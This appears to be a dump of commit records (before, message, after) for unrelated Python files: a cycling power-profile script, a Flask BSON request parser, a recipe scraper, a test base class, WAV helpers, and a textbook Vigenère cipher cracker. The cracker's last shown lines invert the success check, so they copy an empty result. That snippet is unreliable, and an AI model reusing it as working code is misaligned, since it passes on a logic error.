if file.endswith('.fit'):
filenames.append(os.path.join(root, file))
max_duration_rpp = 30
rpp_rider = Rpp(max_duration_rpp=max_duration_rpp)
# Open each file and fit
for idx_file, filename in enumerate(filenames):
print 'Process file #{} over {}'.format(idx_file+1, len(filenames))
# Open the file
power_ride = load_power_from_fit(filename)
# Fit the ride
rpp_rider.fit(power_ride)
# Create a directory to store the data if it is not existing
if not os.path.exists(storage_path):
os.makedirs(storage_path)
# Store the data somewhere
np.save(os.path.join(storage_path, 'profile.npy'), rpp_rider.rpp_)
<commit_msg>Update the pipeline to take into account the outlier rejection method to compute the RPP<commit_after>
|
import sys
import os
import numpy as np
from skcycling.utils import load_power_from_fit
from skcycling.restoration import denoise
from skcycling.power_profile import Rpp
# The first input argument corresponding to the data path
data_path = sys.argv[1]
# The second input argument is the storage directory
storage_path = sys.argv[2]
# We can create a list of all the *.fit files present inside that directory
# Create a list with the files to considered
filenames = []
for root, dirs, files in os.walk(data_path):
for file in files:
if file.endswith('.fit'):
filenames.append(os.path.join(root, file))
max_duration_rpp = 30
rpp_rider = Rpp(max_duration_rpp=max_duration_rpp)
# Open each file and fit
for idx_file, filename in enumerate(filenames):
print 'Process file #{} over {}'.format(idx_file+1, len(filenames))
# Open the file
power_ride = load_power_from_fit(filename)
# Reject the outliers using thresholding method
power_ride = denoise.outliers_rejection(power_ride)
# Fit the ride
rpp_rider.fit(power_ride)
# Create a directory to store the data if it is not existing
if not os.path.exists(storage_path):
os.makedirs(storage_path)
# Store the data somewhere
np.save(os.path.join(storage_path, 'profile.npy'), rpp_rider.rpp_)
|
import sys
import os
import numpy as np
from skcycling.utils import load_power_from_fit
from skcycling.power_profile import Rpp
# The first input argument corresponding to the data path
data_path = sys.argv[1]
# The second input argument is the storage directory
storage_path = sys.argv[2]
# We can create a list of all the *.fit files present inside that directory
# Create a list with the files to considered
filenames = []
for root, dirs, files in os.walk(data_path):
for file in files:
if file.endswith('.fit'):
filenames.append(os.path.join(root, file))
max_duration_rpp = 30
rpp_rider = Rpp(max_duration_rpp=max_duration_rpp)
# Open each file and fit
for idx_file, filename in enumerate(filenames):
print 'Process file #{} over {}'.format(idx_file+1, len(filenames))
# Open the file
power_ride = load_power_from_fit(filename)
# Fit the ride
rpp_rider.fit(power_ride)
# Create a directory to store the data if it is not existing
if not os.path.exists(storage_path):
os.makedirs(storage_path)
# Store the data somewhere
np.save(os.path.join(storage_path, 'profile.npy'), rpp_rider.rpp_)
Update the pipeline to take into account the outlier rejection method to compute the RPPimport sys
import os
import numpy as np
from skcycling.utils import load_power_from_fit
from skcycling.restoration import denoise
from skcycling.power_profile import Rpp
# The first input argument corresponding to the data path
data_path = sys.argv[1]
# The second input argument is the storage directory
storage_path = sys.argv[2]
# We can create a list of all the *.fit files present inside that directory
# Create a list with the files to considered
filenames = []
for root, dirs, files in os.walk(data_path):
for file in files:
if file.endswith('.fit'):
filenames.append(os.path.join(root, file))
max_duration_rpp = 30
rpp_rider = Rpp(max_duration_rpp=max_duration_rpp)
# Open each file and fit
for idx_file, filename in enumerate(filenames):
print 'Process file #{} over {}'.format(idx_file+1, len(filenames))
# Open the file
power_ride = load_power_from_fit(filename)
# Reject the outliers using thresholding method
power_ride = denoise.outliers_rejection(power_ride)
# Fit the ride
rpp_rider.fit(power_ride)
# Create a directory to store the data if it is not existing
if not os.path.exists(storage_path):
os.makedirs(storage_path)
# Store the data somewhere
np.save(os.path.join(storage_path, 'profile.npy'), rpp_rider.rpp_)
|
<commit_before>import sys
import os
import numpy as np
from skcycling.utils import load_power_from_fit
from skcycling.power_profile import Rpp
# The first input argument corresponding to the data path
data_path = sys.argv[1]
# The second input argument is the storage directory
storage_path = sys.argv[2]
# We can create a list of all the *.fit files present inside that directory
# Create a list with the files to considered
filenames = []
for root, dirs, files in os.walk(data_path):
for file in files:
if file.endswith('.fit'):
filenames.append(os.path.join(root, file))
max_duration_rpp = 30
rpp_rider = Rpp(max_duration_rpp=max_duration_rpp)
# Open each file and fit
for idx_file, filename in enumerate(filenames):
print 'Process file #{} over {}'.format(idx_file+1, len(filenames))
# Open the file
power_ride = load_power_from_fit(filename)
# Fit the ride
rpp_rider.fit(power_ride)
# Create a directory to store the data if it is not existing
if not os.path.exists(storage_path):
os.makedirs(storage_path)
# Store the data somewhere
np.save(os.path.join(storage_path, 'profile.npy'), rpp_rider.rpp_)
<commit_msg>Update the pipeline to take into account the outlier rejection method to compute the RPP<commit_after>import sys
import os
import numpy as np
from skcycling.utils import load_power_from_fit
from skcycling.restoration import denoise
from skcycling.power_profile import Rpp
# The first input argument corresponding to the data path
data_path = sys.argv[1]
# The second input argument is the storage directory
storage_path = sys.argv[2]
# We can create a list of all the *.fit files present inside that directory
# Create a list with the files to considered
filenames = []
for root, dirs, files in os.walk(data_path):
for file in files:
if file.endswith('.fit'):
filenames.append(os.path.join(root, file))
max_duration_rpp = 30
rpp_rider = Rpp(max_duration_rpp=max_duration_rpp)
# Open each file and fit
for idx_file, filename in enumerate(filenames):
print 'Process file #{} over {}'.format(idx_file+1, len(filenames))
# Open the file
power_ride = load_power_from_fit(filename)
# Reject the outliers using thresholding method
power_ride = denoise.outliers_rejection(power_ride)
# Fit the ride
rpp_rider.fit(power_ride)
# Create a directory to store the data if it is not existing
if not os.path.exists(storage_path):
os.makedirs(storage_path)
# Store the data somewhere
np.save(os.path.join(storage_path, 'profile.npy'), rpp_rider.rpp_)
|
d6536696f322beba321384ec58c1576b56d3eec2
|
clio/utils.py
|
clio/utils.py
|
import json
from bson import json_util
from flask.wrappers import Request, cached_property
def getBoolean(string):
if string is None:
return False
return {
'1': True, 'yes': True, 'true': True, 'on': True,
'0': False, 'no': False, 'false': False, 'off': False, '': False, None: False
}[string.lower()]
class ExtRequest(Request):
@cached_property
def json(self):
"""If the mimetype is `application/json` this will contain the
parsed JSON data.
"""
if self.mimetype in ('application/json','application/extjson'):
if 'ext' in self.mimetype:
objhook = json_util.object_hook
else:
objhook = None
request_charset = self.mimetype_params.get('charset')
if request_charset is not None:
j = json.loads(self.data, encoding=request_charset, object_hook=objhook )
else:
j = json.loads(self.data, object_hook=objhook)
return j
|
import json
from bson import json_util, BSON
from flask.wrappers import Request, cached_property
def getBoolean(string):
if string is None:
return False
return {
'1': True, 'yes': True, 'true': True, 'on': True,
'0': False, 'no': False, 'false': False, 'off': False, '': False, None: False
}[string.lower()]
class ExtRequest(Request):
@cached_property
def json(self):
"""If the mimetype is `application/json` this will contain the
parsed JSON data.
"""
if self.mimetype == 'application/bson':
return BSON(self.data).decode()
if self.mimetype in ('application/json','application/extjson'):
if 'ext' in self.mimetype:
objhook = json_util.object_hook
else:
objhook = None
request_charset = self.mimetype_params.get('charset')
if request_charset is not None:
j = json.loads(self.data, encoding=request_charset, object_hook=objhook )
else:
j = json.loads(self.data, object_hook=objhook)
return j
|
Add support for decoding data serialized as BSON.
|
Add support for decoding data serialized as BSON.
|
Python
|
apache-2.0
|
geodelic/clio,geodelic/clio
|
import json
from bson import json_util
from flask.wrappers import Request, cached_property
def getBoolean(string):
if string is None:
return False
return {
'1': True, 'yes': True, 'true': True, 'on': True,
'0': False, 'no': False, 'false': False, 'off': False, '': False, None: False
}[string.lower()]
class ExtRequest(Request):
@cached_property
def json(self):
"""If the mimetype is `application/json` this will contain the
parsed JSON data.
"""
if self.mimetype in ('application/json','application/extjson'):
if 'ext' in self.mimetype:
objhook = json_util.object_hook
else:
objhook = None
request_charset = self.mimetype_params.get('charset')
if request_charset is not None:
j = json.loads(self.data, encoding=request_charset, object_hook=objhook )
else:
j = json.loads(self.data, object_hook=objhook)
return j
Add support for decoding data serialized as BSON.
|
import json
from bson import json_util, BSON
from flask.wrappers import Request, cached_property
def getBoolean(string):
if string is None:
return False
return {
'1': True, 'yes': True, 'true': True, 'on': True,
'0': False, 'no': False, 'false': False, 'off': False, '': False, None: False
}[string.lower()]
class ExtRequest(Request):
@cached_property
def json(self):
"""If the mimetype is `application/json` this will contain the
parsed JSON data.
"""
if self.mimetype == 'application/bson':
return BSON(self.data).decode()
if self.mimetype in ('application/json','application/extjson'):
if 'ext' in self.mimetype:
objhook = json_util.object_hook
else:
objhook = None
request_charset = self.mimetype_params.get('charset')
if request_charset is not None:
j = json.loads(self.data, encoding=request_charset, object_hook=objhook )
else:
j = json.loads(self.data, object_hook=objhook)
return j
|
<commit_before>
import json
from bson import json_util
from flask.wrappers import Request, cached_property
def getBoolean(string):
if string is None:
return False
return {
'1': True, 'yes': True, 'true': True, 'on': True,
'0': False, 'no': False, 'false': False, 'off': False, '': False, None: False
}[string.lower()]
class ExtRequest(Request):
@cached_property
def json(self):
"""If the mimetype is `application/json` this will contain the
parsed JSON data.
"""
if self.mimetype in ('application/json','application/extjson'):
if 'ext' in self.mimetype:
objhook = json_util.object_hook
else:
objhook = None
request_charset = self.mimetype_params.get('charset')
if request_charset is not None:
j = json.loads(self.data, encoding=request_charset, object_hook=objhook )
else:
j = json.loads(self.data, object_hook=objhook)
return j
<commit_msg>Add support for decoding data serialized as BSON.<commit_after>
|
import json
from bson import json_util, BSON
from flask.wrappers import Request, cached_property
def getBoolean(string):
if string is None:
return False
return {
'1': True, 'yes': True, 'true': True, 'on': True,
'0': False, 'no': False, 'false': False, 'off': False, '': False, None: False
}[string.lower()]
class ExtRequest(Request):
@cached_property
def json(self):
"""If the mimetype is `application/json` this will contain the
parsed JSON data.
"""
if self.mimetype == 'application/bson':
return BSON(self.data).decode()
if self.mimetype in ('application/json','application/extjson'):
if 'ext' in self.mimetype:
objhook = json_util.object_hook
else:
objhook = None
request_charset = self.mimetype_params.get('charset')
if request_charset is not None:
j = json.loads(self.data, encoding=request_charset, object_hook=objhook )
else:
j = json.loads(self.data, object_hook=objhook)
return j
|
import json
from bson import json_util
from flask.wrappers import Request, cached_property
def getBoolean(string):
if string is None:
return False
return {
'1': True, 'yes': True, 'true': True, 'on': True,
'0': False, 'no': False, 'false': False, 'off': False, '': False, None: False
}[string.lower()]
class ExtRequest(Request):
@cached_property
def json(self):
"""If the mimetype is `application/json` this will contain the
parsed JSON data.
"""
if self.mimetype in ('application/json','application/extjson'):
if 'ext' in self.mimetype:
objhook = json_util.object_hook
else:
objhook = None
request_charset = self.mimetype_params.get('charset')
if request_charset is not None:
j = json.loads(self.data, encoding=request_charset, object_hook=objhook )
else:
j = json.loads(self.data, object_hook=objhook)
return j
Add support for decoding data serialized as BSON.
import json
from bson import json_util, BSON
from flask.wrappers import Request, cached_property
def getBoolean(string):
if string is None:
return False
return {
'1': True, 'yes': True, 'true': True, 'on': True,
'0': False, 'no': False, 'false': False, 'off': False, '': False, None: False
}[string.lower()]
class ExtRequest(Request):
@cached_property
def json(self):
"""If the mimetype is `application/json` this will contain the
parsed JSON data.
"""
if self.mimetype == 'application/bson':
return BSON(self.data).decode()
if self.mimetype in ('application/json','application/extjson'):
if 'ext' in self.mimetype:
objhook = json_util.object_hook
else:
objhook = None
request_charset = self.mimetype_params.get('charset')
if request_charset is not None:
j = json.loads(self.data, encoding=request_charset, object_hook=objhook )
else:
j = json.loads(self.data, object_hook=objhook)
return j
|
<commit_before>
import json
from bson import json_util
from flask.wrappers import Request, cached_property
def getBoolean(string):
if string is None:
return False
return {
'1': True, 'yes': True, 'true': True, 'on': True,
'0': False, 'no': False, 'false': False, 'off': False, '': False, None: False
}[string.lower()]
class ExtRequest(Request):
@cached_property
def json(self):
"""If the mimetype is `application/json` this will contain the
parsed JSON data.
"""
if self.mimetype in ('application/json','application/extjson'):
if 'ext' in self.mimetype:
objhook = json_util.object_hook
else:
objhook = None
request_charset = self.mimetype_params.get('charset')
if request_charset is not None:
j = json.loads(self.data, encoding=request_charset, object_hook=objhook )
else:
j = json.loads(self.data, object_hook=objhook)
return j
<commit_msg>Add support for decoding data serialized as BSON.<commit_after>
import json
from bson import json_util, BSON
from flask.wrappers import Request, cached_property
def getBoolean(string):
if string is None:
return False
return {
'1': True, 'yes': True, 'true': True, 'on': True,
'0': False, 'no': False, 'false': False, 'off': False, '': False, None: False
}[string.lower()]
class ExtRequest(Request):
@cached_property
def json(self):
"""If the mimetype is `application/json` this will contain the
parsed JSON data.
"""
if self.mimetype == 'application/bson':
return BSON(self.data).decode()
if self.mimetype in ('application/json','application/extjson'):
if 'ext' in self.mimetype:
objhook = json_util.object_hook
else:
objhook = None
request_charset = self.mimetype_params.get('charset')
if request_charset is not None:
j = json.loads(self.data, encoding=request_charset, object_hook=objhook )
else:
j = json.loads(self.data, object_hook=objhook)
return j
|
aa359661c31df53885e19f5acb2e0171b6f87398
|
recipe_scrapers/innit.py
|
recipe_scrapers/innit.py
|
from ._abstract import AbstractScraper
"""
Note that innit hosts recipes for several companies. I found it while looking at centralmarket.com
"""
class Innit(AbstractScraper):
@classmethod
def host(self, domain="com"):
return f"innit.{domain}"
|
from ._abstract import AbstractScraper
"""
Note that innit hosts recipes for several companies. I found it while looking at centralmarket.com
"""
class Innit(AbstractScraper):
@classmethod
def host(self, domain="com"):
return f"innit.{domain}"
def title(self):
return self.schema.title()
def total_time(self):
return self.schema.total_time()
def yields(self):
return self.schema.yields()
def image(self):
return self.schema.image()
def ingredients(self):
return self.schema.ingredients()
def instructions(self):
return self.schema.instructions()
def ratings(self):
return self.schema.ratings()
|
Add wrapper methods for clarity.
|
Add wrapper methods for clarity.
|
Python
|
mit
|
hhursev/recipe-scraper
|
from ._abstract import AbstractScraper
"""
Note that innit hosts recipes for several companies. I found it while looking at centralmarket.com
"""
class Innit(AbstractScraper):
@classmethod
def host(self, domain="com"):
return f"innit.{domain}"
Add wrapper methods for clarity.
|
from ._abstract import AbstractScraper
"""
Note that innit hosts recipes for several companies. I found it while looking at centralmarket.com
"""
class Innit(AbstractScraper):
@classmethod
def host(self, domain="com"):
return f"innit.{domain}"
def title(self):
return self.schema.title()
def total_time(self):
return self.schema.total_time()
def yields(self):
return self.schema.yields()
def image(self):
return self.schema.image()
def ingredients(self):
return self.schema.ingredients()
def instructions(self):
return self.schema.instructions()
def ratings(self):
return self.schema.ratings()
|
<commit_before>from ._abstract import AbstractScraper
"""
Note that innit hosts recipes for several companies. I found it while looking at centralmarket.com
"""
class Innit(AbstractScraper):
@classmethod
def host(self, domain="com"):
return f"innit.{domain}"
<commit_msg>Add wrapper methods for clarity.<commit_after>
|
from ._abstract import AbstractScraper
"""
Note that innit hosts recipes for several companies. I found it while looking at centralmarket.com
"""
class Innit(AbstractScraper):
@classmethod
def host(self, domain="com"):
return f"innit.{domain}"
def title(self):
return self.schema.title()
def total_time(self):
return self.schema.total_time()
def yields(self):
return self.schema.yields()
def image(self):
return self.schema.image()
def ingredients(self):
return self.schema.ingredients()
def instructions(self):
return self.schema.instructions()
def ratings(self):
return self.schema.ratings()
|
from ._abstract import AbstractScraper
"""
Note that innit hosts recipes for several companies. I found it while looking at centralmarket.com
"""
class Innit(AbstractScraper):
@classmethod
def host(self, domain="com"):
return f"innit.{domain}"
Add wrapper methods for clarity.from ._abstract import AbstractScraper
"""
Note that innit hosts recipes for several companies. I found it while looking at centralmarket.com
"""
class Innit(AbstractScraper):
@classmethod
def host(self, domain="com"):
return f"innit.{domain}"
def title(self):
return self.schema.title()
def total_time(self):
return self.schema.total_time()
def yields(self):
return self.schema.yields()
def image(self):
return self.schema.image()
def ingredients(self):
return self.schema.ingredients()
def instructions(self):
return self.schema.instructions()
def ratings(self):
return self.schema.ratings()
|
<commit_before>from ._abstract import AbstractScraper
"""
Note that innit hosts recipes for several companies. I found it while looking at centralmarket.com
"""
class Innit(AbstractScraper):
@classmethod
def host(self, domain="com"):
return f"innit.{domain}"
<commit_msg>Add wrapper methods for clarity.<commit_after>from ._abstract import AbstractScraper
"""
Note that innit hosts recipes for several companies. I found it while looking at centralmarket.com
"""
class Innit(AbstractScraper):
@classmethod
def host(self, domain="com"):
return f"innit.{domain}"
def title(self):
return self.schema.title()
def total_time(self):
return self.schema.total_time()
def yields(self):
return self.schema.yields()
def image(self):
return self.schema.image()
def ingredients(self):
return self.schema.ingredients()
def instructions(self):
return self.schema.instructions()
def ratings(self):
return self.schema.ratings()
|
d06ff3fede08430146a03efb7964363fa950b1c9
|
pyon/util/int_test.py
|
pyon/util/int_test.py
|
#!/usr/bin/env python
"""Integration test base class and utils"""
from contextlib import contextmanager
import unittest
from pyon.container.cc import Container
from pyon.core.bootstrap import bootstrap_pyon
# Make this call more deterministic in time.
bootstrap_pyon()
class IonIntegrationTestCase(unittest.TestCase):
"""
Base test class to allow operations such as starting the container
TODO: Integrate with IonUnitTestCase
"""
def run(self, result=None):
unittest.TestCase.run(self, result)
@contextmanager
def container(self):
"""
Context Manager for container in tests.
To use:
with self.container() as cc:
# your tests in here
# container stopped here
"""
self._start_container()
try:
yield self.container
finally:
self._stop_container()
def _start_container(self):
self.container = None
self.addCleanup(self._stop_container)
self.container = Container()
self.container.start()
def _stop_container(self):
if self.container:
self.container.stop()
self.container = None
|
#!/usr/bin/env python
"""Integration test base class and utils"""
from contextlib import contextmanager
import unittest
from pyon.container.cc import Container
from pyon.core.bootstrap import bootstrap_pyon
from mock import patch
# Make this call more deterministic in time.
bootstrap_pyon()
class IonIntegrationTestCase(unittest.TestCase):
"""
Base test class to allow operations such as starting the container
TODO: Integrate with IonUnitTestCase
"""
def run(self, result=None):
unittest.TestCase.run(self, result)
@contextmanager
def container(self):
"""
Context Manager for container in tests.
To use:
with self.container() as cc:
# your tests in here
# container stopped here
"""
self._start_container()
try:
yield self.container
finally:
self._stop_container()
def _start_container(self):
self.container = None
self.addCleanup(self._stop_container)
self.container = Container()
self.container.start()
def _stop_container(self):
if self.container:
self.container.stop()
self.container = None
def _turn_on_queue_auto_delete(self):
patcher = patch('pyon.net.channel.RecvChannel._queue_auto_delete', True)
patcher.start()
self.addCleanup(patcher.stop)
|
Add option to turn on queue auto delete
|
Add option to turn on queue auto delete
|
Python
|
bsd-2-clause
|
mkl-/scioncc,crchemist/scioncc,scionrep/scioncc,mkl-/scioncc,scionrep/scioncc,crchemist/scioncc,scionrep/scioncc,mkl-/scioncc,crchemist/scioncc,ooici/pyon,ooici/pyon
|
#!/usr/bin/env python
"""Integration test base class and utils"""
from contextlib import contextmanager
import unittest
from pyon.container.cc import Container
from pyon.core.bootstrap import bootstrap_pyon
# Make this call more deterministic in time.
bootstrap_pyon()
class IonIntegrationTestCase(unittest.TestCase):
"""
Base test class to allow operations such as starting the container
TODO: Integrate with IonUnitTestCase
"""
def run(self, result=None):
unittest.TestCase.run(self, result)
@contextmanager
def container(self):
"""
Context Manager for container in tests.
To use:
with self.container() as cc:
# your tests in here
# container stopped here
"""
self._start_container()
try:
yield self.container
finally:
self._stop_container()
def _start_container(self):
self.container = None
self.addCleanup(self._stop_container)
self.container = Container()
self.container.start()
def _stop_container(self):
if self.container:
self.container.stop()
self.container = None
Add option to turn on queue auto delete
|
#!/usr/bin/env python
"""Integration test base class and utils"""
from contextlib import contextmanager
import unittest
from pyon.container.cc import Container
from pyon.core.bootstrap import bootstrap_pyon
from mock import patch
# Make this call more deterministic in time.
bootstrap_pyon()
class IonIntegrationTestCase(unittest.TestCase):
"""
Base test class to allow operations such as starting the container
TODO: Integrate with IonUnitTestCase
"""
def run(self, result=None):
unittest.TestCase.run(self, result)
@contextmanager
def container(self):
"""
Context Manager for container in tests.
To use:
with self.container() as cc:
# your tests in here
# container stopped here
"""
self._start_container()
try:
yield self.container
finally:
self._stop_container()
def _start_container(self):
self.container = None
self.addCleanup(self._stop_container)
self.container = Container()
self.container.start()
def _stop_container(self):
if self.container:
self.container.stop()
self.container = None
def _turn_on_queue_auto_delete(self):
patcher = patch('pyon.net.channel.RecvChannel._queue_auto_delete', True)
patcher.start()
self.addCleanup(patcher.stop)
|
<commit_before>#!/usr/bin/env python
"""Integration test base class and utils"""
from contextlib import contextmanager
import unittest
from pyon.container.cc import Container
from pyon.core.bootstrap import bootstrap_pyon
# Make this call more deterministic in time.
bootstrap_pyon()
class IonIntegrationTestCase(unittest.TestCase):
"""
Base test class to allow operations such as starting the container
TODO: Integrate with IonUnitTestCase
"""
def run(self, result=None):
unittest.TestCase.run(self, result)
@contextmanager
def container(self):
"""
Context Manager for container in tests.
To use:
with self.container() as cc:
# your tests in here
# container stopped here
"""
self._start_container()
try:
yield self.container
finally:
self._stop_container()
def _start_container(self):
self.container = None
self.addCleanup(self._stop_container)
self.container = Container()
self.container.start()
def _stop_container(self):
if self.container:
self.container.stop()
self.container = None
<commit_msg>Add option to turn on queue auto delete<commit_after>
|
#!/usr/bin/env python
"""Integration test base class and utils"""
from contextlib import contextmanager
import unittest
from pyon.container.cc import Container
from pyon.core.bootstrap import bootstrap_pyon
from mock import patch
# Make this call more deterministic in time.
bootstrap_pyon()
class IonIntegrationTestCase(unittest.TestCase):
"""
Base test class to allow operations such as starting the container
TODO: Integrate with IonUnitTestCase
"""
def run(self, result=None):
unittest.TestCase.run(self, result)
@contextmanager
def container(self):
"""
Context Manager for container in tests.
To use:
with self.container() as cc:
# your tests in here
# container stopped here
"""
self._start_container()
try:
yield self.container
finally:
self._stop_container()
def _start_container(self):
self.container = None
self.addCleanup(self._stop_container)
self.container = Container()
self.container.start()
def _stop_container(self):
if self.container:
self.container.stop()
self.container = None
def _turn_on_queue_auto_delete(self):
patcher = patch('pyon.net.channel.RecvChannel._queue_auto_delete', True)
patcher.start()
self.addCleanup(patcher.stop)
|
#!/usr/bin/env python
"""Integration test base class and utils"""
from contextlib import contextmanager
import unittest
from pyon.container.cc import Container
from pyon.core.bootstrap import bootstrap_pyon
# Make this call more deterministic in time.
bootstrap_pyon()
class IonIntegrationTestCase(unittest.TestCase):
"""
Base test class to allow operations such as starting the container
TODO: Integrate with IonUnitTestCase
"""
def run(self, result=None):
unittest.TestCase.run(self, result)
@contextmanager
def container(self):
"""
Context Manager for container in tests.
To use:
with self.container() as cc:
# your tests in here
# container stopped here
"""
self._start_container()
try:
yield self.container
finally:
self._stop_container()
def _start_container(self):
self.container = None
self.addCleanup(self._stop_container)
self.container = Container()
self.container.start()
def _stop_container(self):
if self.container:
self.container.stop()
self.container = None
Add option to turn on queue auto delete#!/usr/bin/env python
"""Integration test base class and utils"""
from contextlib import contextmanager
import unittest
from pyon.container.cc import Container
from pyon.core.bootstrap import bootstrap_pyon
from mock import patch
# Make this call more deterministic in time.
bootstrap_pyon()
class IonIntegrationTestCase(unittest.TestCase):
"""
Base test class to allow operations such as starting the container
TODO: Integrate with IonUnitTestCase
"""
def run(self, result=None):
unittest.TestCase.run(self, result)
@contextmanager
def container(self):
"""
Context Manager for container in tests.
To use:
with self.container() as cc:
# your tests in here
# container stopped here
"""
self._start_container()
try:
yield self.container
finally:
self._stop_container()
def _start_container(self):
self.container = None
self.addCleanup(self._stop_container)
self.container = Container()
self.container.start()
def _stop_container(self):
if self.container:
self.container.stop()
self.container = None
def _turn_on_queue_auto_delete(self):
patcher = patch('pyon.net.channel.RecvChannel._queue_auto_delete', True)
patcher.start()
self.addCleanup(patcher.stop)
|
<commit_before>#!/usr/bin/env python
"""Integration test base class and utils"""
from contextlib import contextmanager
import unittest
from pyon.container.cc import Container
from pyon.core.bootstrap import bootstrap_pyon
# Make this call more deterministic in time.
bootstrap_pyon()
class IonIntegrationTestCase(unittest.TestCase):
"""
Base test class to allow operations such as starting the container
TODO: Integrate with IonUnitTestCase
"""
def run(self, result=None):
unittest.TestCase.run(self, result)
@contextmanager
def container(self):
"""
Context Manager for container in tests.
To use:
with self.container() as cc:
# your tests in here
# container stopped here
"""
self._start_container()
try:
yield self.container
finally:
self._stop_container()
def _start_container(self):
self.container = None
self.addCleanup(self._stop_container)
self.container = Container()
self.container.start()
def _stop_container(self):
if self.container:
self.container.stop()
self.container = None
<commit_msg>Add option to turn on queue auto delete<commit_after>#!/usr/bin/env python
"""Integration test base class and utils"""
from contextlib import contextmanager
import unittest
from pyon.container.cc import Container
from pyon.core.bootstrap import bootstrap_pyon
from mock import patch
# Make this call more deterministic in time.
bootstrap_pyon()
class IonIntegrationTestCase(unittest.TestCase):
"""
Base test class to allow operations such as starting the container
TODO: Integrate with IonUnitTestCase
"""
def run(self, result=None):
unittest.TestCase.run(self, result)
@contextmanager
def container(self):
"""
Context Manager for container in tests.
To use:
with self.container() as cc:
# your tests in here
# container stopped here
"""
self._start_container()
try:
yield self.container
finally:
self._stop_container()
def _start_container(self):
self.container = None
self.addCleanup(self._stop_container)
self.container = Container()
self.container.start()
def _stop_container(self):
if self.container:
self.container.stop()
self.container = None
def _turn_on_queue_auto_delete(self):
patcher = patch('pyon.net.channel.RecvChannel._queue_auto_delete', True)
patcher.start()
self.addCleanup(patcher.stop)
|
af42088008ec2592885005e1a6e2b0ae52fd15a8
|
File.py
|
File.py
|
import scipy.io.wavfile as wav
import numpy
import warnings
def wavread(filename):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fs,x = wav.read(filename)
maxv = numpy.iinfo(x.dtype).max
x = x.astype('float')
x = x / maxv
return (fs,x)
def wavwrite(filename, fs, x):
maxv = numpy.iinfo(numpy.int16).max
x /= numpy.max(numpy.abs(x),axis=0);
x *= maxv;
x = x.astype('int16')
wav.write(filename, fs, x)
|
import scipy.io.wavfile as wav
import numpy
import warnings
def wavread(filename):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fs,x = wav.read(filename)
maxv = numpy.iinfo(x.dtype).max
return (fs,x.astype('float') / maxv)
def wavwrite(filename, fs, x):
maxv = numpy.iinfo(numpy.int16).max
wav.write(filename, fs, (x * maxv).astype('int16'))
|
Test fuer WAV write und read gleichheit
|
Test fuer WAV write und read gleichheit
|
Python
|
mit
|
antiface/dspy,nils-werner/dspy
|
import scipy.io.wavfile as wav
import numpy
import warnings
def wavread(filename):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fs,x = wav.read(filename)
maxv = numpy.iinfo(x.dtype).max
x = x.astype('float')
x = x / maxv
return (fs,x)
def wavwrite(filename, fs, x):
maxv = numpy.iinfo(numpy.int16).max
x /= numpy.max(numpy.abs(x),axis=0);
x *= maxv;
x = x.astype('int16')
wav.write(filename, fs, x)Test fuer WAV write und read gleichheit
|
import scipy.io.wavfile as wav
import numpy
import warnings
def wavread(filename):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fs,x = wav.read(filename)
maxv = numpy.iinfo(x.dtype).max
return (fs,x.astype('float') / maxv)
def wavwrite(filename, fs, x):
maxv = numpy.iinfo(numpy.int16).max
wav.write(filename, fs, (x * maxv).astype('int16'))
|
<commit_before>import scipy.io.wavfile as wav
import numpy
import warnings
def wavread(filename):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fs,x = wav.read(filename)
maxv = numpy.iinfo(x.dtype).max
x = x.astype('float')
x = x / maxv
return (fs,x)
def wavwrite(filename, fs, x):
maxv = numpy.iinfo(numpy.int16).max
x /= numpy.max(numpy.abs(x),axis=0);
x *= maxv;
x = x.astype('int16')
wav.write(filename, fs, x)<commit_msg>Test fuer WAV write und read gleichheit<commit_after>
|
import scipy.io.wavfile as wav
import numpy
import warnings
def wavread(filename):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fs,x = wav.read(filename)
maxv = numpy.iinfo(x.dtype).max
return (fs,x.astype('float') / maxv)
def wavwrite(filename, fs, x):
maxv = numpy.iinfo(numpy.int16).max
wav.write(filename, fs, (x * maxv).astype('int16'))
|
import scipy.io.wavfile as wav
import numpy
import warnings
def wavread(filename):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fs,x = wav.read(filename)
maxv = numpy.iinfo(x.dtype).max
x = x.astype('float')
x = x / maxv
return (fs,x)
def wavwrite(filename, fs, x):
maxv = numpy.iinfo(numpy.int16).max
x /= numpy.max(numpy.abs(x),axis=0);
x *= maxv;
x = x.astype('int16')
wav.write(filename, fs, x)Test fuer WAV write und read gleichheitimport scipy.io.wavfile as wav
import numpy
import warnings
def wavread(filename):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fs,x = wav.read(filename)
maxv = numpy.iinfo(x.dtype).max
return (fs,x.astype('float') / maxv)
def wavwrite(filename, fs, x):
maxv = numpy.iinfo(numpy.int16).max
wav.write(filename, fs, (x * maxv).astype('int16'))
|
<commit_before>import scipy.io.wavfile as wav
import numpy
import warnings
def wavread(filename):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fs,x = wav.read(filename)
maxv = numpy.iinfo(x.dtype).max
x = x.astype('float')
x = x / maxv
return (fs,x)
def wavwrite(filename, fs, x):
maxv = numpy.iinfo(numpy.int16).max
x /= numpy.max(numpy.abs(x),axis=0);
x *= maxv;
x = x.astype('int16')
wav.write(filename, fs, x)<commit_msg>Test fuer WAV write und read gleichheit<commit_after>import scipy.io.wavfile as wav
import numpy
import warnings
def wavread(filename):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fs,x = wav.read(filename)
maxv = numpy.iinfo(x.dtype).max
return (fs,x.astype('float') / maxv)
def wavwrite(filename, fs, x):
maxv = numpy.iinfo(numpy.int16).max
wav.write(filename, fs, (x * maxv).astype('int16'))
|
93d066f464a048881010a9d468a727a48e78c69d
|
books/CrackingCodesWithPython/Chapter20/vigenereDictionaryHacker.py
|
books/CrackingCodesWithPython/Chapter20/vigenereDictionaryHacker.py
|
# Vigenère Cipher Dictionary Hacker
# https://www.nostarch.com/crackingcodes/ (BSD Licensed)
from books.CrackingCodesWithPython.pyperclip import copy
from books.CrackingCodesWithPython.Chapter11.detectEnglish import isEnglish
from books.CrackingCodesWithPython.Chapter18.vigenereCipher import decryptMessage
def main():
ciphertext = """Tzx isnz eccjxkg nfq lol mys bbqq I lxcz."""
hackedMessage = hackVigenereDictionary(ciphertext)
if not hackedMessage:
print('Copying hacked message to clipboard:')
print(hackedMessage)
copy(hackedMessage)
